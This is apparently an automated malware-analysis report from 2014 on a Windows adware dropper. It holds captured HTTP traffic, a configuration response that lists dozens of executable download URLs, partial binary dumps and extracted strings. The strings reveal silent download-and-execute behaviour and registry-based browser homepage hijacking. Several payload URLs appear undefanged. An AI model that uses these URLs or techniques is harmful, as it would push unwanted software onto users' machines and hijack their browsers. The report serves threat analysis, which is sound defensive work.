GIF89a2.........f..3...33....................................................................................!..NETSCAPE2.0.....!..Powered by AFEI.!.......,....2...... !.di.hjBl..p,....x......`P.(...GR.D6...CH....,..@8.... -..EQc.8...........`...."....................~"..H........H......"...$....#.........."..........."Z.......*...%!.!.......,....2...... !.di.hjBl..p,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."....................~"..I........I......"...$....#.........."..........."\.......*...%!.!.......,....2...... !.di.hjBl..p,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."....................~"..I........I......"...$....#.........."..........."\.......*...%!.;..
GET /stat.php?id=4327411&web_id=4327411&show=pic HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: s85.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 May 2014 04:13:17 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 03 May 2014 04:13:17 GMT
Expires: Sat, 03 May 2014 05:43:17 GMT
2597..(function(){function l(){this.c="4327411";this.R="z";this.N="pic";this.K="";this.M="";this.o="1399090397";this.P="hzs2.cnzz.com";this.L="";this.s="CNZZDATA" this.c;this.r="_CNZZDbridge_" this.c;this.G="_cnzz_CV" this.c;this.u="0";this.B={};this.a={};this.la()}function g(a,b){try{var c=[];c.push("siteid=4327411");.c.push("name=" d(a.name));c.push("msg=" d(a.message));c.push("r=" d(h.referrer));c.push("page=" d(f.location.href));c.push("agent=" d(f.navigator.userAgent));c.push("ex=" d(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(e){}}var h=document,f=window,d=encodeURIComponent,k=decodeURIComponent,p=unescape,r=escape,m="https:"===f.location.protocol?"https:":"http:",s=m "//c.cnzz.com/core.php";l.prototype={la:function(){try{this.U(),.this.J(),this.ia(),this.H(),this.m(),this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),f[this.r]=f[this.r]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;f._czc={push:function(){return a.C.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=f._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":f._cz_account="[object String]"===.{}.toString.call(c[1])?c[1]:String(c[1]);break;case "_setAutoPageview":"boolean"===typeof c[1]&&(f._cz_autoPageview=c[1])}}}catch(e){g(e,"cS failed")}},qa:function(){try{if("undefined"===typeof f._
<<
<<< skipped >>>
GET /js/s.js HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: cbjs.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 03 May 2014 04:13:17 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 16 Apr 2014 09:59:09 GMT
Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Sat, 03 May 2014 04:18:17 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
3437..............yW......S..\j...M{zl./..6m...i..,M......B....{. m...{..].A...~.a{.....bv5.......w..0.....i.n.N&...e.x.-..E.....t...iR....__D..YxQ.ic7......pz>..e...........g..|....6%.j%.\.}o.E.d....Y.~....{x.........0.f.(...i..C>..r...I.g.X..(.2O.Iq.3..i..w..a....4.....`...A..{..p?..Q~....Q.}=.q$..I..D..4...'A....n9...<.#.4...0....<|..}..0.7.....".E.tk ..j.N~.._...i...|.....Q.q.h.2]].......ux.O....n...|.-.U.(....~..........t...k....Q{.M.....Z~.OO..".|... a..h6.\5..A...z....7d.5....2.4w.0L...w.."k....$..?;H....@..W.......z.......Z.0...t.zb....v=1..3...~|..mm=k.|..O[[Y{v..Q..Yf.a.1:..Y..*W.d(.......A5..'. }lo......:cj?G..zY{Z...I.Y.........O}?..x.?.OTU....T.9.j"Ozt..c...=.....>...}Lq..l.]V..C .5.... ..Y}..X..g.....~o....?..O.4....;.0....e.....yk....z.c..4..i`>..X...1[...Q........&..4.E2.g...Q;.E.EV..y9....$Z\M..c&.$.....aV....Wo...v....(.|p{.|....*....rW>...L .=.....(....y....e...@O.qc....}.R3o}.=8x..k>..=..9...i6..w ..(N.......H... i...,.Wa..!1I.a.......;l....f....."'r.N.q.^.t.!.W...q{1..%..G......Y....7....a..A..-...._.@....3[.c....j.....K....2..ej_h..w."l..j.B..I........4.Z...............,z..;.wv.e.(...:............XV..-]...'.f...H...b&..@~...1M.O/.M..........A..b.'Ys.<...c.....jM.Y..o?...z....y.">.....0...Cx....yQ...,k..q9...v.M&.^m.7..|.3..C......!.......8........(&Y4m<.g.G.y1...xq~.g..lx.i..#{..l..M..J....@4.);...H..r.V.Ijy'..,9;a....l.(Zd@.=.0...D .:I.......vy.M...5..//......qe..>.p..hfV..ld|^f5......A.X...W..`.v...bA..R.|4....F..' ..x..T.......6.0..L........)l.5.i#.c}
<<
<<< skipped >>>
GET /stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=1731199553-1399090397-&showp=1176x885&st=0&sin=&t=&rnd=781481770 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: hzs2.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Sat, 03 May 2014 04:13:18 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /9.gif?abc=1&rnd=1744112357 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Sat, 03 May 2014 04:13:18 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=3lrrC1t5szUCAbhrJibxV mH; expires=Tue, 30-Apr-24 04:13:18 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=b06048a6; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=f38f50178d3ad709c1babc3e_1399090398; expires=Tue, 30-Apr-24 04:13:18 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=3lrrC1t5szUCAbhrJibxV mH
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;..
GET /ad/softad/pwb.htm HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: adsvc2.9365.info
Connection: Keep-Alive
Cookie: CNZZDATA4327411=cnzz_eid=1731199553-1399090397-&ntime=1399090397&cnzz_a=0<ime=1399072949231
HTTP/1.1 200 OK
Content-Length: 1194
Content-Type: text/html
Last-Modified: Tue, 29 Apr 2014 09:39:37 GMT
Accept-Ranges: bytes
ETag: "facfafef8e63cf1:17e4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 May 2014 04:11:44 GMT
[dl]..hXXp://211.101.12.49/dls/axuls.exe=..hXXp://211.101.12.49/dls/axult.exe=..hXXp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe=..hXXp://download.wuji.com/wuji/open/setup_open_341.exe=..hXXp://click.t3nlink.com/link/140896/setup_2948-140896.exe=..hXXp://down.u5c.net/NmnPps_1217.exe=..http://download.grandcloud.cn/9291/19156/yszj_zhimeng_160110.exe=..http://down.yuemar.net:888/yuemar_x06.exe=..hXXp://xz.657080.com/download.php/LD_2075_S.exe=..hXXp://VVV.huamei-global.com/play_3020_161196.exe=..hXXp://xz.ieanquan.com/download/dianxin_silent[57].exe=..hXXp://down.xiaoxinrili.com/hezi/jm/s1014.exe=..hXXp://222.76.213.168:8765/sOnlinetime1.4.1_1114.exe=..hXXp://xz.fuzhicheng.com/n/pczh_110_157239.exe=..hXXp://download.grandcloud.cn/9291/17992/play_2051_144002.exe=..http://downloads.t3nlink.com/packages/g_wz/default2/wuzun-zm-157391-v6.exe=..hXXp://download.grandcloud.cn/9291/19899/fjyy_slient_zhimeng_162411.exe=..hXXp://lm.beilequ.com/update/365/365weatherIns_202.exe=..hXXp://download.grandcloud.cn/9291/20572/-8388_158017_xc.exe=..[pw]..hXXp://hao.6360.info/=..[hp]..hXXp://hao.6360.info/=..[hp2]..hao.uenet.info=..
GET /dls/axuls.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 211.101.12.49
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 148992
Content-Type: application/octet-stream
Last-Modified: Thu, 01 May 2014 11:27:48 GMT
Accept-Ranges: bytes
ETag: "7c718d613065cf1:17e4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 03 May 2014 04:11:46 GMT
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..............................................@...................................@...L................... ..T...................................................................................CODE....P........................... ..`DATA................................@...BSS.....1................................idata..............................@....tls.....................................rdata..............................@..P.reloc..T.... ......................@..P.rsrc....L...@...L..................@..P.....................F..............@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...Integer...........D.@...StringP.@...Variant.@...@...............................@..........7@..7@..7@..7@..7@..5@.05@.l5@..TObject..@...TObject..@........System....@...IInterface....................F.System......D$....M...D$....M...D$....M.....@...@...@....................F .@...........@.,.@...........................@.....\.@..7@..^@..^@..7@..7@..^@.05@.l5@..TInterfacedObject....@...TBoundArray............(.@..System.%..A....%..A....%..A....%..A....%..A....%..
<<
<<< skipped >>>
GET /dls/axult.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 211.101.12.49
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 143872
Content-Type: application/octet-stream
Last-Modified: Thu, 01 May 2014 11:27:42 GMT
Accept-Ranges: bytes
ETag: "6889185e3065cf1:17e4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 03 May 2014 04:11:49 GMT
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................z....0...L..........................................................................................................CODE................................ ..`DATA................................@...BSS.....9................................idata..z...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....L...0...L..................@..P.....................2..............@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...Integer...........D.@...StringP.@...Variant.@...@...............................@..........7@..7@..7@..7@..7@..5@.05@.l5@..TObject..@...TObject..@........System....@...IInterface....................F.System......D$....M...D$....M...D$....M.....@...@...@....................F .@...........@.,.@...........................@.....\.@..7@..^@..^@..7@..7@..^@.05@.l5@..TInterfacedObject....@...TBoundArray............(.@..System.%..A....%..A....%..A....%..A....%..A....%..
<<
<<< skipped >>>
GET /core.php?web_id=4327411&show=pic&t=z HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 May 2014 04:13:18 GMT
Content-Type: application/javascript
Content-Length: 801
Connection: keep-alive
Last-Modified: Sat, 03 May 2014 04:13:18 GMT
Expires: Sat, 03 May 2014 04:28:18 GMT
!function(){var a,b,c,d=encodeURIComponent,e="4327411",f="pic",g="",h="online_v3.php",i="hzs2.cnzz.com",j="1",k="pic",l="z",m="站长统计",n=window["_CNZZDbridge_" e].bobject,o="https:"==document.location.protocol?"https:":"http:",p="0",q=o "//online.cnzz.com/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g)),r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cnzz.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):(b="z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://quanjing.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<a href='" b "' target=_blank title='" m "'><img border=0 hspace=0 vspace=0 src='" c "'></a>"):a="<a href='" b "' target=_blank title='" m "'>" m "</a>",n.createIcon([a])))}();.....
GET /app.gif?&cna=3lrrC1t5szUCAbhrJibxV mH HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 May 2014 04:13:19 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=3lrrC1t5szUCAbhrJibxV mH; expires=Tue, 30-Apr-24 04:13:19 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;..
Map
Strings from Dumps
vsgrtaho.exe_2880:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s_%d
%s_%d
.Owner
.Owner
EInvalidGraphicOperation
EInvalidGraphicOperation
UhÛ
UhÛ
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
PasswordCharLDD
PasswordCharLDD
OnKeyDown
OnKeyDown
OnKeyPressH
OnKeyPressH
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
IMM32.DLL
IMM32.DLL
AutoHotkeysl:D
AutoHotkeysl:D
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview`AD
KeyPreview`AD
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
ole32.dll
ole32.dll
olepro32.dll
olepro32.dll
IWebBrowser
IWebBrowser
IWebBrowserApp\
IWebBrowserApp\
IWebBrowser2
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserOnTheaterMode
TWebBrowser
TWebBrowser
webpopup
webpopup
webcount
webcount
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
Program Files\Internet Explorer\iexplore.exe
Program Files\Internet Explorer\iexplore.exe
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\DefaultIcon
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\DefaultIcon
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)\Command
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)\Command
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\ShellFolder
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\ShellFolder
\ieframe.dll,-190
\ieframe.dll,-190
\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
Program Files\Internet Explorer\iexplore.exe"
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
*.lnk
*.lnk
Opera.lnk
Opera.lnk
WiseBrowser.lnk
WiseBrowser.lnk
TT.lnk
TT.lnk
Mozilla Firefox.lnk
Mozilla Firefox.lnk
3.lnk
3.lnk
Maxthon.lnk
Maxthon.lnk
pwb.dll
pwb.dll
http://adsvc2.9365.info/ad/softad/pwb.htm
http://adsvc2.9365.info/ad/softad/pwb.htm
http://www.9365.info
http://www.9365.info
www.9365.info
www.9365.info
xxvfrg.bat
xxvfrg.bat
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
>#>'> >/>
>#>'> >/>
2"3&3*3.32363:3>3
2"3&3*3.32363:3>3
;%; ;7;?;{;
;%; ;7;?;{;
>(>3>;>[>{>
>(>3>;>[>{>
< <$<(<,<0<</pre><pre>8'8/8@8[8</pre><pre>1 1$1(1,10141</pre><pre>465;5_5{5</pre><pre>KWindows</pre><pre>UrlMon</pre><pre>Font.Charset</pre><pre>Font.Color</pre><pre>Font.Height</pre><pre>Font.Name</pre><pre>Font.Style</pre><pre>http://adsvc2.9365.info/ad/softad/popup.htm</pre><pre>http://adsvc2.9365.info/count/softcount/?pwb</pre><pre>8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table Of Contents</pre><pre>No help found for %s#No context-sensitive help installed$No topic-based help system installed</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s</pre><pre>Unable to insert a line Clipboard does not support Icons/Menu '%s' is already being used by another form</pre><pre>Error setting %s.Count</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic</pre><pre>Unsupported clipboard format</pre><pre>Cannot create file %s</pre><pre>Cannot open file %s</pre><pre>Unable to write to %s</pre><pre>Invalid stream format$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Invalid variant operation"Variant method calls not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction%Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'</pre><pre>!'%s' is not a valid integer value('%s' is not a valid floating point value</pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time</pre><pre>I/O error %d</pre><b>axuls.exe_1884:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>kernel32.dll</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>u%CNu</pre><pre>Uh.AA</pre><pre>.Owner</pre><pre>rswdgb.bat</pre><pre>http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8</pre><pre>Program Files\Internet Explorer\iexplore.exe"</pre><pre>SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command</pre><pre>GGSafe_tjywmax(52).exe</pre><pre>http://download.grandcloud.cn/9291/15765/GGSafe.exe</pre><pre>hzsoft\GGSafe_tjywmax(52).exe</pre><pre>IFoxInstall-y-c203945859-run-s-x.exe</pre><pre>http://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe</pre><pre>http://download.grandcloud.cn/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe</pre><pre>hzsoft\IFoxInstall-y-c203945859-run-s-x.exe</pre><pre>setup_open_341.exe</pre><pre>http://download.wuji.com/wuji/open/setup_open_341.exe</pre><pre>hzsoft\setup_open_341.exe</pre><pre>s1014.exe</pre><pre>http://down.xiaoxinrili.com/hezi/jm/s1014.exe</pre><pre>hzsoft\s1014.exe</pre><pre>dianxin_silent[57].exe</pre><pre>http://xz.ieanquan.com/download/dianxin_silent[57].exe</pre><pre>hzsoft\dianxin_silent[57].exe</pre><pre>setupX_2001_131.exe</pre><pre>http://www.yldsjs.com/setupX_2001_131.exe</pre><pre>hzsoft\setupX_2001_131.exe</pre><pre>LD_2075_S.exe</pre><pre>http://xz.657080.com/download.php/LD_2075_S.exe</pre><pre>hzsoft\LD_2075_S.exe</pre><pre>http://download.wallba.com/download.php/kuping_s_50996.exe</pre><pre>hzsoft\kuping_s_50996.exe</pre><pre>sOnlinetime1.4.1_1114.exe</pre><pre>http://222.76.213.168:8765/sOnlinetime1.4.1_1114.exe</pre><pre>http://download.grandcloud.cn/9291/17153/sOnlinetime1.4.1_1114.exe</pre><pre>hzsoft\sOnlinetime1.4.1_1114.exe</pre><pre>setup_2948-140896.exe</pre><pre>http://click.t3nlink.com/link/140896/setup_2948-140896.exe</pre><pre>hzsoft\setup_2948-140896.exe</pre><pre>pczh_110_157239.exe</pre><pre>http://xz.fuzhicheng.com/n/pczh_110_157239.exe</pre><pre>hzsoft\pczh_110_157239.exe</pre><pre>play_2051_144002.exe</pre><pre>http://download.grandcloud.cn/9291/17992/play_2051_144002.exe</pre><pre>hzsoft\play_2051_144002.exe</pre><pre>play_3020_161196.exe</pre><pre>http://www.huamei-global.com/play_3020_161196.exe</pre><pre>hzsoft\play_3020_161196.exe</pre><pre>fjyy_slient_zhimeng_162411.exe</pre><pre>http://download.grandcloud.cn/9291/19899/fjyy_slient_zhimeng_162411.exe</pre><pre>hzsoft\fjyy_slient_zhimeng_162411.exe</pre><pre>unersqa.exe</pre><pre>unotcvb.exe</pre><pre>setup_open_188.exe</pre><pre>setupX_054.exe</pre><pre>setup_2949-14598.exe</pre><pre>Program Files\2345Explorer\Uninstall.exe</pre><pre>http://www.9365.info</pre><pre>user32.dll</pre><pre>GetKeyboardType</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegCloseKey</pre><pre>oleaut32.dll</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>WinExec</pre><pre>GetWindowsDirectoryA</pre><pre>GetCPInfo</pre><pre>URLMON.DLL</pre><pre>URLDownloadToFileA</pre><pre>6 6$6(6,6064686<6</pre><pre>7"7&7*7.72767</pre><pre>?'? ?/?3?7?;?</pre><pre>0"0&0*0.02060</pre><pre>KWindows</pre><pre>UrlMon</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>%s.Seek not implemented$Operation 